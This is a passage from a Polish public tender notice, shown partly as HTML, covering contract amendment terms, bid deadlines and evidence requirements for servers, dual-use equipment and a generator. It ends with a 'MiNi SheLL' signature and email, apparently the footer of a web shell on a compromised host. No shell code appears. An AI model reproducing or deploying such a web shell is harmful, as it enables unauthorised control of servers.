najm.takichjakmodel oferow.lub który został udoskonalony albo dodatk.wyposaż.,zacenęnie wyższąniżpodanaw ofercie.4.Zmiany, o których mowa w nin.paragrafie niemogąw żadnym wyp.stanowićpodst.dozwiększ.wys.wynagr.Wykon.Każda ze zmian,októrych mowa w nin.paragrafie możenatomiast skutk. obniż. wys. wynagrodz. Wykon.5.W przypad. wskaz.ust.2pkt2 i pkt10, ter.wykon.umowy ulega odpow. zm.o okres trwaniatych okoliczn.celemukończ.przedm.umowy w sposób należyty. Zm.term.realiz.następ.odpow. w dniach, o okres wktórymwystąpiływyżej wym.okolicz.warunk.zm.term.wykon. umowy. 3.Zamaw.inform.że zm.umowy może nast.w przyp., o których głosiArt. 455 Ust. 1 pkt 2-4 oraz Ust. 2 Ustawy Pzp. Ponadto dop.się możl.zm.postan. zawart.umów w stos. dotreścioferty, na podst.której dokon.wyboru Wykon.w syt., jeżeli wyst. nieprzewidzian okol.o obiektywn.charakt, która w sposób istot. wpł.na możl.wykon.przedm.umowy (dla części 1,2,4). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-14 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> cd. przedmiotowe środki dowodowe Część 3:9)-karta produktowa oferow. urządzenia umożliw. weryfik. parametrów oprogramowania;-oświadcz. producenta lub autoryzowanego dystrybutora producenta na terenie Polski, iż produkty poch. z autoryzow.o kanału sprzedaży, np. poprzez oświadcz. o posiad.stat. autoryzacyjnym;- wymaga się, aby w przyp. istnieniatakiego wymogu w stos.do technologii objętej przedm.niniejszego postępowania (tzw. produkty podwójnego zastosow.), został uzyskany dok. pochodz. od importera tej technologii stwierdz., iż przy jej wprowadz. na teryt. Polski, zostały dochowane wymogi wł. przepisów prawa, w tym ustawy z dnia 29 listopada 2000 r. o obrocie z zagranicą towarami, technologiami i usługami o znaczeniu strategicznym dla bezpieczeństwa państwa, a także dla utrzymania międzynarod. pokoju i bezpieczeństwa (Dz.U. z 2004, Nr 229, poz. 2315 z późn zm.) oraz dok. potw., że importer posiada certyfikowany przez właśc. jednostkę syst. zarządz. jakością tzw. wewn. syst. kontroli wym. dla wspólnotowego syst. kontroli wywozu, transferu, pośrednictwa i tranzytu w odn. do prod.podwójnego zastosowania.11)	- karta produktowa oferowanego serwera umożliw. weryfik. jego parametrów; oświadcz. producenta serwera, że serwer jest wyprod. zgodnie z normą ISO-9001:2015, ISO 50001 oraz ISO-14001;oświadcz. producenta w zakr. deklaracji CE dla serwera;oświadcz. producenta serwera lub podmiotu realizuj. serwis, że w przyp. awarii dysku twardego w urządzeniu objętym aktywnym wsparciem technicznym, uszkodz. dysk twardy pozostaje Zamawiającego; oświadcz.producenta serwera: -że serwis urządzenia będzie realizow. bezpośr. przez Producenta i/lub we współpracy z Autoryzowanym Partnerem Serwisowym Producenta, -że sprzęt pochodzi z oficjaln.kan. dystrybucyjnego producenta;dokum. potwierdz., że:- firma serwisująca pos. ISO 9001:2015 oraz ISO-27001 na świadcz. usług serwisowych oraz pos. autoryzację producenta urządzenia;-że sprzęt spełnia normy co najmn.Epeat Silver według normy z 2019 r.;-że oferow.serwer znajd.się na liście Windows Server Catalog i pos.stat.„Certified for Windows” dla syst. Microsoft Windows Server 2022, Microsoft Windows Server 2025;oświadcz. producenta, że oferow. serwer jest wyposaż.wrozw.zapewn.ochronę oprogramowania układowego przed manipulacjązłośliwegooprogramowania. Ochronatakamusibyćzgodna z zalec. NIST SP 800-147B i NIST SP 800-155 i posiada zaimplementowane sprzętowo mechanizmy kryptograf. poświadcz.integralność oprogramow. BIOS (Root of Trust)<br/>12)	- karta produktowa oferowan. urządzenia (wszystk. trzech typów) umożliw.weryfik. parametrów oprogramow.;oświadcz. producenta lub autoryzowan. dystrybutora producenta na ter. Polski, iż produkty poch. z autoryzowan. kanału sprzedaży, np. poprzez oświadcz. o posiad. statusie autoryzacyjnym;wymaga się, aby w przyp. istnienia takiego wym. w stos. do technologii objętej przedm. niniej. postępow. (tzw. produkty podwójnego zastosowania), został uzysk. dok. pochodz. od importera tej technologii stwierdzający, iż przy jej wprowadz. na teryt. Polski, zostały dochowane wymogi wł. przepisów prawa, w tym ustawy z dnia 29 listopada 2000 r. o obrocie z zagranicą towarami, technologiami i usługami o znaczeniu strategicznym dla bezpieczeństwa państwa, a także dla utrzymania międzyn. pokoju i bezpieczeństwa (Dz.U.z2004,Nr229,poz.2315zpóźnzm.) oraz dokument potw., że importer posiada certyfikowany przez właściwą jednostkę sys. zarz. jakością tzw. wewn. syst. kontroli wymag. dla wspólnotowego systemu kontroli wywozu, transferu, pośrednictwa i tranzytu w odnies.do produktów podwójn. zastosowania.<br/>Część 4:<br/>1)	karta produktowa oferow. agregatu umoż. weryfik. parametrów;oświadcz. producenta urządzeń w zakresie deklaracji CE;certyfikat producenta w zakr. wdroż. systemu ISO 9001:2015 oraz AQAP 2110:2016;oświadcz. producenta agregatu, że posiada on w Polsce oddział, serwis oraz magazyn części zamiennych i mater.eksploatac.;oświadcz. o możliw. przeprowadz. prób fabrycznych FAT przed dostarcz. agregatu.

Creat By MiNi SheLL
Email: jattceo@gmail.com